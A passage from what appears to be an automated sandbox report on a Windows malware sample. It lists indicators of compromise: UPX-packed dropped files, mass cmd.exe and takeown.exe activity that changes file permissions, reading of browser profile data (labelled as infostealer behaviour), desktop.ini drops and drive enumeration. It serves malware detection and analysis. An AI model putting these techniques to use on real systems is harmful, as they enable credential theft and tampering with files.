behavioral1/files/0x00030000000131c9-1204.dat upx behavioral1/files/0x00030000000131c9-1206.dat upx behavioral1/files/0x00030000000131c9-1211.dat upx behavioral1/files/0x00030000000131c9-1213.dat upx behavioral1/files/0x00030000000131c9-1214.dat upx behavioral1/files/0x00030000000131c9-1216.dat upx behavioral1/files/0x00030000000131c9-1221.dat upx behavioral1/files/0x00030000000131c9-1223.dat upx behavioral1/files/0x00030000000131c9-1224.dat upx behavioral1/files/0x00030000000131c9-1226.dat upx behavioral1/files/0x00030000000131c9-1231.dat upx behavioral1/files/0x00030000000131c9-1233.dat upx behavioral1/files/0x00030000000131c9-1234.dat upx behavioral1/files/0x00030000000131c9-1236.dat upx behavioral1/files/0x00030000000131c9-1241.dat upx behavioral1/files/0x00030000000131c9-1243.dat upx behavioral1/files/0x00030000000131c9-1244.dat upx behavioral1/files/0x00030000000131c9-1246.dat upx behavioral1/files/0x00030000000131c9-1251.dat upx behavioral1/files/0x00030000000131c9-1253.dat upx behavioral1/files/0x00030000000131c9-1254.dat upx behavioral1/files/0x00030000000131c9-1256.dat upx behavioral1/files/0x00030000000131c9-1261.dat upx behavioral1/files/0x00030000000131c9-1263.dat upx behavioral1/files/0x00030000000131c9-1264.dat upx behavioral1/files/0x00030000000131c9-1266.dat upx behavioral1/files/0x00030000000131c9-1271.dat upx behavioral1/files/0x00030000000131c9-1273.dat upx behavioral1/files/0x00030000000131c9-1274.dat upx behavioral1/files/0x00030000000131c9-1276.dat upx behavioral1/files/0x00030000000131c9-1281.dat upx behavioral1/files/0x00030000000131c9-1283.dat upx behavioral1/files/0x00030000000131c9-1284.dat upx behavioral1/files/0x00030000000131c9-1286.dat upx behavioral1/files/0x00030000000131c9-1291.dat upx behavioral1/files/0x00030000000131c9-1293.dat upx behavioral1/files/0x00030000000131c9-1294.dat upx behavioral1/files/0x00030000000131c9-1296.dat upx behavioral1/files/0x00030000000131c9-1301.dat upx behavioral1/files/0x00030000000131c9-1303.dat upx behavioral1/files/0x00030000000131c9-1304.dat upx behavioral1/files/0x00030000000131c9-1306.dat upx behavioral1/files/0x00030000000131c9-1311.dat upx behavioral1/files/0x00030000000131c9-1313.dat upx behavioral1/files/0x00030000000131c9-1314.dat upx behavioral1/files/0x00030000000131c9-1316.dat upx behavioral1/files/0x00030000000131c9-1321.dat upx behavioral1/files/0x00030000000131c9-1323.dat upx behavioral1/files/0x00030000000131c9-1324.dat upx behavioral1/files/0x00030000000131c9-1326.dat upx behavioral1/files/0x00030000000131c9-1331.dat upx behavioral1/files/0x00030000000131c9-1333.dat upx behavioral1/files/0x00030000000131c9-1334.dat upx behavioral1/files/0x00030000000131c9-1336.dat upx behavioral1/files/0x00030000000131c9-1341.dat upx behavioral1/files/0x00030000000131c9-1343.dat upx behavioral1/files/0x00030000000131c9-1344.dat upx behavioral1/files/0x00030000000131c9-1346.dat upx behavioral1/files/0x00030000000131c9-1351.dat upx behavioral1/files/0x00030000000131c9-1353.dat upx behavioral1/files/0x00030000000131c9-1354.dat upx behavioral1/files/0x00030000000131c9-1356.dat upx behavioral1/files/0x00030000000131c9-1361.dat upx behavioral1/files/0x00030000000131c9-1363.dat upx behavioral1/files/0x00030000000131c9-1364.dat upx behavioral1/files/0x00030000000131c9-1366.dat upx behavioral1/files/0x00030000000131c9-1371.dat upx behavioral1/files/0x00030000000131c9-1373.dat upx behavioral1/files/0x00030000000131c9-1374.dat upx behavioral1/files/0x00030000000131c9-1376.dat upx behavioral1/files/0x00030000000131c9-1381.dat upx behavioral1/files/0x00030000000131c9-1383.dat upx behavioral1/files/0x00030000000131c9-1384.dat upx behavioral1/files/0x00030000000131c9-1386.dat upx behavioral1/files/0x00030000000131c9-1391.dat upx behavioral1/files/0x00030000000131c9-1393.dat upx behavioral1/files/0x00030000000131c9-1394.dat upx behavioral1/files/0x00030000000131c9-1396.dat upx behavioral1/files/0x00030000000131c9-1401.dat upx behavioral1/files/0x00030000000131c9-1403.dat upx behavioral1/files/0x00030000000131c9-1404.dat upx behavioral1/files/0x00030000000131c9-1406.dat upx behavioral1/files/0x00030000000131c9-1411.dat upx behavioral1/files/0x00030000000131c9-1413.dat upx behavioral1/files/0x00030000000131c9-1414.dat upx behavioral1/files/0x00030000000131c9-1416.dat upx behavioral1/files/0x00030000000131c9-1421.dat upx behavioral1/files/0x00030000000131c9-1423.dat upx behavioral1/files/0x00030000000131c9-1424.dat upx behavioral1/files/0x00030000000131c9-1426.dat upx behavioral1/files/0x00030000000131c9-1431.dat upx behavioral1/files/0x00030000000131c9-1433.dat upx behavioral1/files/0x00030000000131c9-1434.dat upx behavioral1/files/0x00030000000131c9-1436.dat upx behavioral1/files/0x00030000000131c9-1441.dat upx behavioral1/files/0x00030000000131c9-1443.dat upx behavioral1/files/0x00030000000131c9-1444.dat upx behavioral1/files/0x00030000000131c9-1446.dat upx behavioral1/files/0x00030000000131c9-1451.dat upx behavioral1/files/0x00030000000131c9-1453.dat upx behavioral1/files/0x00030000000131c9-1454.dat upx behavioral1/files/0x00030000000131c9-1456.dat upx behavioral1/files/0x00030000000131c9-1461.dat upx behavioral1/files/0x00030000000131c9-1463.dat upx behavioral1/files/0x00030000000131c9-1464.dat upx behavioral1/files/0x00030000000131c9-1466.dat upx behavioral1/files/0x00030000000131c9-1471.dat upx behavioral1/files/0x00030000000131c9-1473.dat upx behavioral1/files/0x00030000000131c9-1474.dat upx behavioral1/files/0x00030000000131c9-1476.dat upx behavioral1/files/0x00030000000131c9-1481.dat upx behavioral1/files/0x00030000000131c9-1483.dat upx behavioral1/files/0x00030000000131c9-1484.dat upx behavioral1/files/0x00030000000131c9-1486.dat upx behavioral1/files/0x00030000000131c9-1491.dat upx behavioral1/files/0x00030000000131c9-1493.dat upx behavioral1/files/0x00030000000131c9-1494.dat upx behavioral1/files/0x00030000000131c9-1496.dat upx behavioral1/files/0x00030000000131c9-1501.dat upx behavioral1/files/0x00030000000131c9-1503.dat upx behavioral1/files/0x00030000000131c9-1504.dat upx behavioral1/files/0x00030000000131c9-1506.dat upx behavioral1/files/0x00030000000131c9-1511.dat upx behavioral1/files/0x00030000000131c9-1513.dat upx behavioral1/files/0x00030000000131c9-1514.dat upx behavioral1/files/0x00030000000131c9-1516.dat upx behavioral1/files/0x00030000000131c9-1521.dat upx behavioral1/files/0x00030000000131c9-1523.dat upx behavioral1/files/0x00030000000131c9-1524.dat upx behavioral1/files/0x00030000000131c9-1526.dat upx behavioral1/files/0x00030000000131c9-1531.dat upx behavioral1/files/0x00030000000131c9-1533.dat upx behavioral1/files/0x00030000000131c9-1534.dat upx behavioral1/files/0x00030000000131c9-1536.dat upx behavioral1/files/0x00030000000131c9-1541.dat upx behavioral1/files/0x00030000000131c9-1543.dat upx behavioral1/files/0x00030000000131c9-1544.dat upx behavioral1/files/0x00030000000131c9-1546.dat upx behavioral1/files/0x00030000000131c9-1551.dat upx behavioral1/files/0x00030000000131c9-1553.dat upx behavioral1/files/0x00030000000131c9-1554.dat upx behavioral1/files/0x00030000000131c9-1556.dat upx behavioral1/files/0x00030000000131c9-1561.dat upx behavioral1/files/0x00030000000131c9-1563.dat upx behavioral1/files/0x00030000000131c9-1564.dat upx behavioral1/files/0x00030000000131c9-1566.dat upx behavioral1/files/0x00030000000131c9-1571.dat upx behavioral1/files/0x00030000000131c9-1573.dat upx behavioral1/files/0x00030000000131c9-1574.dat upx behavioral1/files/0x00030000000131c9-1576.dat upx behavioral1/files/0x00030000000131c9-1581.dat upx behavioral1/files/0x00030000000131c9-1583.dat upx behavioral1/files/0x00030000000131c9-1584.dat upx behavioral1/files/0x00030000000131c9-1586.dat upx behavioral1/files/0x00030000000131c9-1591.dat upx behavioral1/files/0x00030000000131c9-1593.dat upx behavioral1/files/0x00030000000131c9-1594.dat upx behavioral1/files/0x00030000000131c9-1596.dat upx behavioral1/files/0x00030000000131c9-1601.dat upx behavioral1/files/0x00030000000131c9-1603.dat upx behavioral1/files/0x00030000000131c9-1604.dat upx behavioral1/files/0x00030000000131c9-1606.dat upx behavioral1/files/0x00030000000131c9-1611.dat upx behavioral1/files/0x00030000000131c9-1613.dat upx behavioral1/files/0x00030000000131c9-1614.dat upx behavioral1/files/0x00030000000131c9-1616.dat upx behavioral1/files/0x00030000000131c9-1621.dat upx behavioral1/files/0x00030000000131c9-1623.dat upx behavioral1/files/0x00030000000131c9-1624.dat upx behavioral1/files/0x00030000000131c9-1626.dat upx behavioral1/files/0x00030000000131c9-1631.dat upx behavioral1/files/0x00030000000131c9-1633.dat upx behavioral1/files/0x00030000000131c9-1634.dat upx behavioral1/files/0x00030000000131c9-1636.dat upx behavioral1/files/0x00030000000131c9-1641.dat upx behavioral1/files/0x00030000000131c9-1643.dat upx behavioral1/files/0x00030000000131c9-1644.dat upx behavioral1/files/0x00030000000131c9-1646.dat upx behavioral1/files/0x00030000000131c9-1651.dat upx behavioral1/files/0x00030000000131c9-1653.dat upx behavioral1/files/0x00030000000131c9-1654.dat upx behavioral1/files/0x00030000000131c9-1656.dat upx behavioral1/files/0x00030000000131c9-1661.dat upx behavioral1/files/0x00030000000131c9-1663.dat upx behavioral1/files/0x00030000000131c9-1664.dat upx behavioral1/files/0x00030000000131c9-1666.dat upx behavioral1/files/0x00030000000131c9-1671.dat upx behavioral1/files/0x00030000000131c9-1673.dat upx behavioral1/files/0x00030000000131c9-1674.dat upx behavioral1/files/0x00030000000131c9-1676.dat upx behavioral1/files/0x00030000000131c9-1681.dat upx behavioral1/files/0x00030000000131c9-1683.dat upx behavioral1/files/0x00030000000131c9-1684.dat upx behavioral1/files/0x00030000000131c9-1686.dat upx behavioral1/files/0x00030000000131c9-1691.dat upx behavioral1/files/0x00030000000131c9-1693.dat upx behavioral1/files/0x00030000000131c9-1694.dat upx behavioral1/files/0x00030000000131c9-1696.dat upx behavioral1/files/0x00030000000131c9-1701.dat upx behavioral1/files/0x00030000000131c9-1703.dat upx behavioral1/files/0x00030000000131c9-1704.dat upx behavioral1/files/0x00030000000131c9-1706.dat upx behavioral1/files/0x00030000000131c9-1711.dat upx behavioral1/files/0x00030000000131c9-1713.dat upx behavioral1/files/0x00030000000131c9-1714.dat upx behavioral1/files/0x00030000000131c9-1716.dat upx behavioral1/files/0x00030000000131c9-1721.dat upx behavioral1/files/0x00030000000131c9-1723.dat upx behavioral1/files/0x00030000000131c9-1724.dat upx behavioral1/files/0x00030000000131c9-1726.dat upx behavioral1/files/0x00030000000131c9-1731.dat upx behavioral1/files/0x00030000000131c9-1733.dat upx behavioral1/files/0x00030000000131c9-1734.dat upx behavioral1/files/0x00030000000131c9-1736.dat upx behavioral1/files/0x00030000000131c9-1741.dat upx behavioral1/files/0x00030000000131c9-1743.dat upx behavioral1/files/0x00030000000131c9-1744.dat upx behavioral1/files/0x00030000000131c9-1746.dat upx behavioral1/files/0x00030000000131c9-1751.dat upx behavioral1/files/0x00030000000131c9-1753.dat upx behavioral1/files/0x00030000000131c9-1754.dat upx behavioral1/files/0x00030000000131c9-1756.dat upx behavioral1/files/0x00030000000131c9-1761.dat upx behavioral1/files/0x00030000000131c9-1763.dat upx behavioral1/files/0x00030000000131c9-1764.dat upx behavioral1/files/0x00030000000131c9-1766.dat upx behavioral1/files/0x00030000000131c9-1771.dat upx behavioral1/files/0x00030000000131c9-1773.dat upx behavioral1/files/0x00030000000131c9-1774.dat upx behavioral1/files/0x00030000000131c9-1776.dat upx behavioral1/files/0x00030000000131c9-1781.dat upx behavioral1/files/0x00030000000131c9-1783.dat upx behavioral1/files/0x00030000000131c9-1784.dat upx behavioral1/files/0x00030000000131c9-1786.dat upx behavioral1/files/0x00030000000131c9-1791.dat upx behavioral1/files/0x00030000000131c9-1793.dat upx behavioral1/files/0x00030000000131c9-1794.dat upx behavioral1/files/0x00030000000131c9-1796.dat upx behavioral1/files/0x00030000000131c9-1801.dat upx behavioral1/files/0x00030000000131c9-1803.dat upx behavioral1/files/0x00030000000131c9-1804.dat upx behavioral1/files/0x00030000000131c9-1806.dat upx behavioral1/files/0x00030000000131c9-1811.dat upx behavioral1/files/0x00030000000131c9-1813.dat upx behavioral1/files/0x00030000000131c9-1814.dat upx behavioral1/files/0x00030000000131c9-1816.dat upx -
Loads dropped DLL 360 IoCs
pid Process 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 528 cmd.exe 560 V779npJ7.exe 672 cmd.exe 856 cmd.exe 1784 cmd.exe 1036 cmd.exe 672 cmd.exe 568 cmd.exe 1956 cmd.exe 1848 cmd.exe 360 cmd.exe 1668 cmd.exe 1740 cmd.exe 1392 cmd.exe 1796 cmd.exe 1676 cmd.exe 1284 cmd.exe 960 cmd.exe 1464 cmd.exe 532 cmd.exe 796 cmd.exe 340 cmd.exe 1516 cmd.exe 864 cmd.exe 1868 cmd.exe 960 cmd.exe 1148 cmd.exe 532 cmd.exe 1376 cmd.exe 948 cmd.exe 968 cmd.exe 820 cmd.exe 1956 cmd.exe 900 cmd.exe 1676 cmd.exe 1836 cmd.exe 1148 cmd.exe 316 cmd.exe 1668 cmd.exe 1276 cmd.exe 1076 cmd.exe 1836 cmd.exe 1872 cmd.exe 616 cmd.exe 1120 cmd.exe 1808 cmd.exe 1472 cmd.exe 1836 cmd.exe 1372 cmd.exe 616 cmd.exe 1152 cmd.exe 1040 cmd.exe 1792 cmd.exe 320 cmd.exe 1800 cmd.exe 1688 cmd.exe 1836 cmd.exe 1152 cmd.exe 2032 cmd.exe 1792 cmd.exe 2008 cmd.exe 1800 cmd.exe 1052 cmd.exe 1836 cmd.exe 1688 cmd.exe 616 cmd.exe 796 cmd.exe 228 cmd.exe 1464 cmd.exe 1944 cmd.exe 216 cmd.exe 1120 cmd.exe 232 cmd.exe 792 cmd.exe 1980 cmd.exe 1052 cmd.exe 940 cmd.exe 1480 cmd.exe 1068 cmd.exe 608 cmd.exe 224 cmd.exe 1688 cmd.exe 776 cmd.exe 1800 cmd.exe 864 cmd.exe 1040 cmd.exe 1276 cmd.exe 1152 cmd.exe 1980 cmd.exe 828 cmd.exe 236 cmd.exe 224 cmd.exe 608 cmd.exe 1068 cmd.exe 1120 cmd.exe 1984 cmd.exe 972 cmd.exe 1052 cmd.exe 1792 cmd.exe 796 cmd.exe 1816 cmd.exe 948 cmd.exe 616 cmd.exe 228 cmd.exe 216 cmd.exe 1472 cmd.exe 232 cmd.exe 1120 cmd.exe 1956 cmd.exe 968 cmd.exe 1808 cmd.exe 316 cmd.exe 1476 cmd.exe 1656 cmd.exe 1376 cmd.exe 1052 cmd.exe 1176 cmd.exe 208 cmd.exe 320 cmd.exe 232 cmd.exe 1112 cmd.exe 1744 cmd.exe 1144 cmd.exe 1472 cmd.exe 1480 cmd.exe 2016 cmd.exe 1092 cmd.exe 776 cmd.exe 1500 cmd.exe 1276 cmd.exe 1816 cmd.exe 1120 cmd.exe 776 cmd.exe 1052 cmd.exe 1068 cmd.exe 864 cmd.exe 1548 cmd.exe 1624 cmd.exe 900 cmd.exe 2032 cmd.exe 864 cmd.exe 320 cmd.exe 1112 cmd.exe 1076 cmd.exe 620 cmd.exe 1008 cmd.exe 1740 cmd.exe 236 cmd.exe 1152 cmd.exe 1800 cmd.exe 1068 cmd.exe 1128 cmd.exe 1548 cmd.exe 2016 cmd.exe 1472 cmd.exe 1792 cmd.exe 856 cmd.exe 532 cmd.exe 1548 cmd.exe 1284 cmd.exe 208 cmd.exe 1348 cmd.exe 1972 cmd.exe 1052 cmd.exe 1276 cmd.exe 776 cmd.exe 208 cmd.exe 1980 cmd.exe 1972 cmd.exe 224 cmd.exe 1276 cmd.exe 1212 cmd.exe 208 cmd.exe 1144 cmd.exe 1972 cmd.exe 820 cmd.exe 1276 cmd.exe 1284 cmd.exe 2008 cmd.exe 900 cmd.exe 1972 cmd.exe 1476 cmd.exe 1276 cmd.exe 1112 cmd.exe 2008 cmd.exe 1092 cmd.exe 204 cmd.exe 796 cmd.exe 1276 cmd.exe 1376 cmd.exe 1676 cmd.exe 2032 cmd.exe 960 cmd.exe 224 cmd.exe 972 cmd.exe 1584 cmd.exe 1676 cmd.exe 616 cmd.exe 960 cmd.exe 864 cmd.exe 972 cmd.exe 2016 cmd.exe 1676 cmd.exe 1068 cmd.exe 960 cmd.exe 1128 cmd.exe 972 cmd.exe 1472 cmd.exe 1676 cmd.exe 1800 cmd.exe 960 cmd.exe 1740 cmd.exe 972 cmd.exe 1008 cmd.exe 796 cmd.exe 896 cmd.exe 1744 cmd.exe 620 cmd.exe 1956 cmd.exe 472 cmd.exe 1816 cmd.exe 1092 cmd.exe 1212 cmd.exe 608 cmd.exe 1808 cmd.exe 1152 cmd.exe 1548 cmd.exe 1560 cmd.exe 532 cmd.exe 1984 cmd.exe 568 cmd.exe 1112 cmd.exe 864 cmd.exe 820 cmd.exe 1052 cmd.exe 1076 cmd.exe 888 cmd.exe 1284 cmd.exe 940 cmd.exe 2032 cmd.exe 1040 cmd.exe 1276 cmd.exe 1092 cmd.exe 2016 cmd.exe 1480 cmd.exe 320 cmd.exe 1624 cmd.exe 1052 cmd.exe 1372 cmd.exe 1836 cmd.exe 1128 cmd.exe 896 cmd.exe 232 cmd.exe 1872 cmd.exe 316 cmd.exe 1284 cmd.exe 1744 cmd.exe 1476 cmd.exe 208 cmd.exe 1112 cmd.exe 940 cmd.exe 1652 cmd.exe 2008 cmd.exe 1040 cmd.exe 208 cmd.exe 1052 cmd.exe 1284 cmd.exe 1808 cmd.exe 1076 cmd.exe 1120 cmd.exe 216 cmd.exe 1128 cmd.exe 1984 cmd.exe 236 cmd.exe 968 cmd.exe 1500 cmd.exe 796 cmd.exe 1816 cmd.exe 776 cmd.exe 1128 cmd.exe 1040 cmd.exe 900 cmd.exe 216 cmd.exe 896 cmd.exe 1144 cmd.exe 1980 cmd.exe 1624 cmd.exe 620 cmd.exe 472 cmd.exe 1504 cmd.exe 1836 cmd.exe 1500 cmd.exe 1656 cmd.exe 1816 cmd.exe 232 cmd.exe 620 cmd.exe 1976 cmd.exe 1504 cmd.exe 608 cmd.exe 228 cmd.exe 1212 cmd.exe 1348 cmd.exe 1092 cmd.exe 960 cmd.exe 212 cmd.exe 1800 cmd.exe 1376 cmd.exe 1480 cmd.exe 1976 cmd.exe 1348 cmd.exe 320 cmd.exe 960 cmd.exe 712 cmd.exe 1476 cmd.exe 1408 cmd.exe 1480 cmd.exe 1516 cmd.exe 1144 cmd.exe 2016 cmd.exe 1120 cmd.exe 1152 cmd.exe 1476 cmd.exe 212 cmd.exe 1652 cmd.exe 1792 cmd.exe 856 cmd.exe 532 cmd.exe 224 cmd.exe 1504 cmd.exe 1500 cmd.exe 712 cmd.exe 1372 cmd.exe 1408 cmd.exe 1052 cmd.exe 1860 cmd.exe 1120 cmd.exe 1112 cmd.exe 1040 cmd.exe 1276 cmd.exe 1144 cmd.exe 1800 cmd.exe 1364 cmd.exe 1068 cmd.exe 224 cmd.exe 1284 cmd.exe 608 cmd.exe 1996 cmd.exe 856 cmd.exe 1212 cmd.exe 1980 cmd.exe 896 cmd.exe 776 cmd.exe 212 cmd.exe 1276 cmd.exe 796 cmd.exe 1652 cmd.exe 236 cmd.exe 220 cmd.exe -
Modifies file permissions 1 TTPs 179 IoCs
pid Process 1068 takeown.exe 1548 takeown.exe 1876 takeown.exe 796 takeown.exe 712 takeown.exe 1144 takeown.exe 1560 takeown.exe 1152 takeown.exe 1676 takeown.exe 856 takeown.exe 972 takeown.exe 1008 takeown.exe 796 takeown.exe 1792 takeown.exe 1128 takeown.exe 1128 takeown.exe 896 takeown.exe 1512 takeown.exe 1032 takeown.exe 1548 takeown.exe 1808 takeown.exe 1372 takeown.exe 864 takeown.exe 776 takeown.exe 472 takeown.exe 1120 takeown.exe 1800 takeown.exe 1092 takeown.exe 864 takeown.exe 320 takeown.exe 900 takeown.exe 1068 takeown.exe 220 takeown.exe 212 takeown.exe 1500 takeown.exe 948 takeown.exe 236 takeown.exe 856 takeown.exe 1800 takeown.exe 1972 takeown.exe 1512 takeown.exe 1836 takeown.exe 1740 takeown.exe 1476 takeown.exe 236 takeown.exe 940 takeown.exe 1128 takeown.exe 1868 takeown.exe 1276 takeown.exe 1212 takeown.exe 672 takeown.exe 896 takeown.exe 1276 takeown.exe 1092 takeown.exe 1040 takeown.exe 620 takeown.exe 1740 takeown.exe 820 takeown.exe 864 takeown.exe 1488 takeown.exe 1484 takeown.exe 796 takeown.exe 2008 takeown.exe 1076 takeown.exe 1372 takeown.exe 1996 takeown.exe 1516 takeown.exe 1868 takeown.exe 1076 takeown.exe 1656 takeown.exe 224 takeown.exe 948 takeown.exe 1472 takeown.exe 532 takeown.exe 1516 takeown.exe 208 takeown.exe 864 takeown.exe 1036 takeown.exe 1980 takeown.exe 904 takeown.exe 204 takeown.exe 1808 takeown.exe 948 takeown.exe 1500 takeown.exe 1276 takeown.exe 204 takeown.exe 1592 takeown.exe 2008 takeown.exe 232 takeown.exe 212 takeown.exe 316 takeown.exe 796 takeown.exe 1740 takeown.exe 864 takeown.exe 1516 takeown.exe 224 takeown.exe 1972 takeown.exe 1212 takeown.exe 776 takeown.exe 1496 takeown.exe 1668 takeown.exe 1068 takeown.exe 1744 takeown.exe 1560 takeown.exe 1092 takeown.exe 1676 takeown.exe 796 takeown.exe 1112 takeown.exe 712 takeown.exe 1956 takeown.exe 1624 takeown.exe 1872 takeown.exe 1836 takeown.exe 1284 takeown.exe 1744 takeown.exe 320 takeown.exe 1560 takeown.exe 236 takeown.exe 1128 takeown.exe 1872 takeown.exe 960 takeown.exe 1036 takeown.exe 1560 takeown.exe 1076 takeown.exe 1120 takeown.exe 960 takeown.exe 1688 takeown.exe 776 takeown.exe 1212 takeown.exe 940 takeown.exe 1792 takeown.exe 320 takeown.exe 864 takeown.exe 1876 takeown.exe 1976 takeown.exe 232 takeown.exe 1284 takeown.exe 1284 takeown.exe 896 takeown.exe 236 takeown.exe 1996 takeown.exe 900 takeown.exe 224 takeown.exe 1212 takeown.exe 1372 takeown.exe 1092 takeown.exe 224 takeown.exe 940 takeown.exe 1744 takeown.exe 320 takeown.exe 1348 takeown.exe 1656 takeown.exe 1656 takeown.exe 896 takeown.exe 1372 takeown.exe 1956 takeown.exe 212 takeown.exe 940 takeown.exe 568 takeown.exe 220 takeown.exe 1592 takeown.exe 1836 takeown.exe 1376 takeown.exe 1052 takeown.exe 900 takeown.exe 1376 takeown.exe 1516 takeown.exe 1112 takeown.exe 888 takeown.exe 972 takeown.exe 1624 takeown.exe 1212 takeown.exe 228 takeown.exe 532 takeown.exe 1480 takeown.exe 900 takeown.exe 1676 takeown.exe 568 takeown.exe 208 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 34 IoCs
description ioc Process File opened for modification C:\Users\Admin\Pictures\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Public\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\0V5SICB9\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Public\Music\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Public\Videos\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Public\Desktop\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Public\Downloads\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\UBDEWKGM\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Admin\Videos\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Admin\Searches\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Admin\Documents\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\4AO3J8KQ\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Admin\Music\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Admin\Links\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Public\Videos\Sample Videos\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Public\Pictures\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\G9Q5MRQ4\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Public\Recorded TV\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Public\Documents\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Public\Libraries\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\U: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\R: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\P: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\F: V779npJ764.exe File opened (read-only) \??\O: V779npJ764.exe File opened (read-only) \??\V: V779npJ764.exe File opened (read-only) \??\X: V779npJ764.exe File opened (read-only) \??\Z: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\W: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\K: V779npJ764.exe File opened (read-only) \??\L: V779npJ764.exe File opened (read-only) \??\R: V779npJ764.exe File opened (read-only) \??\V: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\I: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\F: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\H: V779npJ764.exe File opened (read-only) \??\N: V779npJ764.exe File opened (read-only) \??\P: V779npJ764.exe File opened (read-only) \??\U: V779npJ764.exe File opened (read-only) \??\T: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\O: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\L: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\A: V779npJ764.exe File opened (read-only) \??\W: V779npJ764.exe File opened (read-only) \??\Y: V779npJ764.exe File opened (read-only) \??\N: 